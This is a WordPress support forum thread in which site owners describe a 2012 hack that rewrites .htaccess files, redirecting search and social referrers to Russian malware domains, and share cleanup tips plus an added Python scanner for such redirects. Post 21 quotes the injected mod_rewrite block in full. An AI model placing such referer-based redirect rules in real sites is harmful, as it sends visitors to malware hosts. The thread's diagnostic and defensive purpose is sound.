Was our website hacked? PLEASE HELP! (30 posts)

  1. jaxsonhype
    Member
    Posted 2 years ago #

    For some of our posts on our page (www.Metszilla.com), when we go to click on the link in order to read the full post, we get sent to this address (http://uaroyalysdaliachu.ru/industry/index.php) and an error message pops up.

    The same thing happens when we upload the link to Facebook and you try to navigate from Facebook to our page; it sends you right to http://uaroyalysdaliachu.ru/industry/index.php

    PLEASE HELP!

  2. friendlyspeaking
    Member
    Posted 2 years ago #

    Same here. Since yesterday it has been redirecting to http://uaroyalysdaliachu.ru, and now the Google search engine has started showing a malware notice on the website when you go through the search engine. Something got infected in WordPress on 15th Feb. 2012. Please post the solution or any malware removal script if anyone has tried it.

  3. rewiaca
    Member
    Posted 2 years ago #

    Solution:
    Chmod .htaccess from 444 to 666
    Check .htaccess and remove the lines at the top and bottom of the document.

    BUT! I'm cleaning the htaccess file for the third time in a day. WordPress core or some plugins have a vulnerability. Need qualified advice.

  4. yaniv1983
    Member
    Posted 2 years ago #

    Same here.

    1. Updated .htaccess
    2. Re-uploaded all core files
    3. Ran the "Timthumb Scanner" plugin

    The problem is still here, with a link to the same site as you all mentioned. Please, if you find a solution, post it here... Thanks!

  5. esmi
    Forum Moderator
    Posted 2 years ago #

  6. Hydromantic
    Member
    Posted 2 years ago #

    Hi everyone!

    Exactly the same problem here unfortunately... I tried various things but nothing works. Did you find which files were hacked? I can't find them...

    Many thanks!!

  7. croftonwiffleball
    Member
    Posted 2 years ago #

    Hey all, this happened to me too? I have no idea what I need to do to fix it? I'm a newb when it comes to this stuff!

  8. Hydromantic
    Member
    Posted 2 years ago #

    I tried the fresh install but it changed nothing unfortunately...

  9. Mickstah
    Member
    Posted 2 years ago #

    I had a friend who had his WordPress installation hacked just over the weekend. This is the second time it has happened, even after a fresh install and security measures put in place.

    If possible talk to your hosting company to see if they can offer a solution. In his case it was a problem on the hosting side.

  10. Hydromantic
    Member
    Posted 2 years ago #

    It seems that the problem comes from the index page but I don't find much more...

  11. friendlyspeaking
    Member
    Posted 2 years ago #

    Hi, I contacted my server provider (HostGator) about this issue. They scanned and cleaned all the malware scripts, which were even injected in the root domain. Then I submitted to Google Webmaster Tools for "Attack Page Website message" removal, and within 24 hours all sites were back to normal. Do contact your server provider, because this is something you cannot clean on your own quickly. I found HostGator extremely helpful, which is why I had shifted my sites from GoDaddy to HostGator.

  12. friendlyspeaking
    Member
    Posted 2 years ago #

    You can check here if your website got blacklisted in google because of malware, you can also check which files on your server got infected by this malware.

    click here http://sitecheck.sucuri.net/scanner/

  13. rewiaca
    Member
    Posted 2 years ago #

    Solution:
    1. Chmod .htaccess from 444 to 666
    2. Check .htaccess and remove the lines at the top and bottom of the document.
    3. Chmod .htaccess from 666 to 444

    works for me

    this shit was in htaccess:
    for seo:

    [Code moderated as per the Forum Rules. Please use the pastebin]

  14. xXcyberXx
    Member
    Posted 2 years ago #

    This is not the best solution; the malware script will still be there.
    Does anybody have another solution for this?
    I have found more files with malware in the subdirectories. For example, in the subdirectory wp-admin there is one file called wp-ggxy.php,
    and I have detected more than one file with names like wp-xxxx.php.

  15. Hydromantic
    Member
    Posted 2 years ago #

    Unfortunately I found nothing in the htaccess file, do you mean the one in the root of the domain?

    I didn't find any corrupted subdirectory either...

  16. dreamdrivendesigns
    Member
    Posted 2 years ago #

    Restoring backups of last working copy doesn't work. All the .htaccess files were back with redirects within hours. Has anyone found a solution?

  17. jaxsonhype
    Member
    Posted 2 years ago #

    OK guys, finally got it fixed but it was a painful process. In short, you have to restore your blog, but I'll post exactly what we did from start to finish:

    * Temporarily fixed the issue by going into our cPanel file manager and editing our hd access file. I would think this is different for every hosting service, so my advice would be to call your hosting company and have them take a look at the file.

    * After the temp fix acted up I restored the blog. I first backed up the blog creating a new file. After backing up the site to an earlier date; in our case I chose Jan 29th. After it was fixed -- I went to Google search to make sure -- I then went into our cPanel and deleted the file I backed up.

  18. Hydromantic
    Member
    Posted 2 years ago #

    Any news about this hacking attack?

  19. welpix
    Member
    Posted 2 years ago #

    Same here. First it was inserting http://daliachu-uaroyalys.ru/industry/index.php into .htaccess files; now it's adding http://uaroyalysdaliachu.ru/industry/index.php

    I cleaned my PC
    completely re-installed all WP blogs
    set 444 attributes to all .htaccess files

    but in 10 minutes it happened again. It's like catching the wind ...

  20. MickeyRoush
    Member
    Posted 2 years ago #

    welpix wrote:

    set 444 attributes to all .htaccess files

    but in 10 minutes it happened again. It's like catching the wind ...

    If they are rewriting/overwriting your .htaccess files then they may have server access. Have you checked your FTP/SFTP logs?

  21. Hydromantic
    Member
    Posted 2 years ago #

    Yep. They add this code to the htaccess file:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    RewriteRule ^(.*)$ http://bannortimqimulta.ru/industry/index.php [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
    RewriteRule ^(.*)$ http://bannortimqimulta.ru/industry/index.php [R=301,L]
    </IfModule>

    And they change the htaccess permissions to 444 instead of 604. What can we do?

  22. rewiaca
    Member
    Posted 2 years ago #

    Okay guys, I have the same problem so far...
    Nothing helps

    BTW: not only WordPress was hacked; I have websites on DLE and Livestreet, and they also have that annoying htaccess replacing. SO IT'S NOT a WordPress vulnerability!

    If I could only trace what script is editing htaccess, maybe some kind of server logs?

  23. KEXINO
    Member
    Posted 2 years ago #

    Same issue here (with WP sites).

    Looking around I found a bunch of .php files. I think it's these files which are re-filling the .htaccess files with all the redirection junk.

    For me, the dodgy .php files were found in various subfolders within wp-content/uploads.

    I've weeded out all the files, changed all user passwords, ftp passwords and db passwords. I've installed BulletPoint, though I don't know how much that'll help (before I found all the dodgy files my .htaccess file was still getting overwritten, even with BulletPoint active).

    Before, my .htaccess files were being overwritten within 15-20 mins of me clearing out the garbage. Now, it's been 2 hours and everything is still OK - touch wood.

    HTH.
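
Added example (not part of any post in this thread, and not WordPress or hosting-provider code): a Python script for the two checks posters describe above, finding `.htaccess` files whose RewriteRule sends Referer-matched visitors to an external host, and finding PHP files sitting under `wp-content/uploads`. The sample `.htaccess`, the host `redirect.example` and the file names are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(?:https?://([^/\s:]+))?", re.I)
# Constructed sample: shortened referer list, placeholder redirect host.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|bing|facebook)\\.(.*)
RewriteRule ^(.*)$ http://redirect.example/industry/index.php [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""

def suspicious_redirects(text, own_hosts=()):
    """Hosts that a Referer-conditioned RewriteRule sends visitors to."""
    hits, armed = [], False
    for line in text.splitlines():
        rule = RULE_RE.match(line)
        if COND_RE.match(line):
            armed = True  # the condition guards the next RewriteRule
        elif rule:
            host = (rule.group(1) or "").lower()  # empty for local targets
            if armed and host and host not in own_hosts:
                hits.append(host)
            armed = False
    return hits

def scan_docroot(root, own_hosts=()):
    """Flag injected .htaccess redirects and PHP files under wp-content/uploads."""
    findings = []
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.name == ".htaccess":
            text = path.read_text(errors="replace")
            findings += [("htaccess-redirect", rel, h)
                         for h in suspicious_redirects(text, own_hosts)]
        elif "wp-content/uploads/" in rel and path.suffix.lower() == ".php":
            findings.append(("php-in-uploads", rel, ""))
    return sorted(findings)

def demo():
    # Build a constructed docroot in a temporary directory and scan it.
    with tempfile.TemporaryDirectory() as root:
        up = Path(root, "wp-content/uploads/2012")
        up.mkdir(parents=True)
        Path(root, ".htaccess").write_text(SAMPLE_HTACCESS)
        (up / "photo.jpg").write_text("")
        (up / "dropped.php").write_text("<?php // placeholder")
        return scan_docroot(root)
```

Pass your own domains as `own_hosts` so legitimate canonical-host redirects are not reported. A hit is a lead for cleanup, not proof that every dropped file has been found.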

  24. welpix
    Member
    Posted 2 years ago #

    I have re-installed clean 4 out of my 10 blogs about 14 hours ago. They are clean so far. What I did differently is I used only a limited number of plugins. My suspicion is that anything beyond these may be causing it.

    all-in-one-seo-pack
    google-sitemap-generator
    woocommerce
    wp-super-cache
    contact-form-7
    widget-context

  25. rewiaca
    Member
    Posted 2 years ago #

    HOLD ON I GOT IT!!!

    CHECK YOUR WORDPRESS THEME FOR THE FOLLOWING FILES AND DIRS:

    /inc.php
    /timthumb.php
    /cache/ (with a lot of external_1f3d51de6d5f7b7e7fca0af8a635a413.php)

    If some of your sites have this shit, then this is the place where the malware comes from.
    Just rename these files (add some symbols to the file name) and clean your htaccess files; I suppose all will be well.

    timthumb.php has a vulnerability!

    More information:
    http://www.claudiokuenzler.com/blog/206/another-timthumb-wordpress-hack-external-upload-httpd-process

  26. welpix
    Member
    Posted 2 years ago #

    None of those were in mine, but there is one good article about it as well: http://blog.sucuri.net/2011/05/understanding-htaccess-attacks-part-1.html

  27. Charles Kelley
    Member
    Posted 2 years ago #

    Rewiaca- Did renaming those files fix the issue permanently (or thus far) for you?

    I just started getting these this morning, have tried to replace .htaccess files only to have them rewritten 10 minutes later. Has anything actually worked permanently for anyone?

    Trying to avoid doing a complete re-install for the 20+ sites I have hosted if it's not WordPress' vulnerability.

    Just curious...what web host is everyone using? I use BlueHost.

  28. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Just renaming files will not solve the problem. You have to be very aggressive in cleaning and replacing files. Follow the instructions in the above links and check out the other links folks have posted here. Notify your host. If you have problems it is likely that everyone on the server has problems.

    When clean follow this http://codex.wordpress.org/Hardening_WordPress.

    If you are unable to do it yourself there are sites like http://sitecheck.sucuri.net that will do it for you.

  29. KEXINO
    Member
    Posted 2 years ago #

    +1 for sucuri.net.

    After grappling with the problem myself for the best part of a day, I threw in the towel and signed-up for their $190/yr plan. They sorted the problem out on all my sites and now continuously monitor/scan every few hours for anything unusual.

    If you're running a commercial / mission critical site you might want to consider using them, if for nothing else than peace of mind.

    (No affiliation, just a recommendation).

  30. Charles Kelley
    Member
    Posted 2 years ago #

    All, we've found a working fix to this problem. See the whole post here and follow my directions, which are more secure than some that others are offering.

    http://wordpress.org/support/topic/i-have-been-well-and-truly-hacked?replies=46#post-2642987

Topic Closed

This topic has been closed to new replies.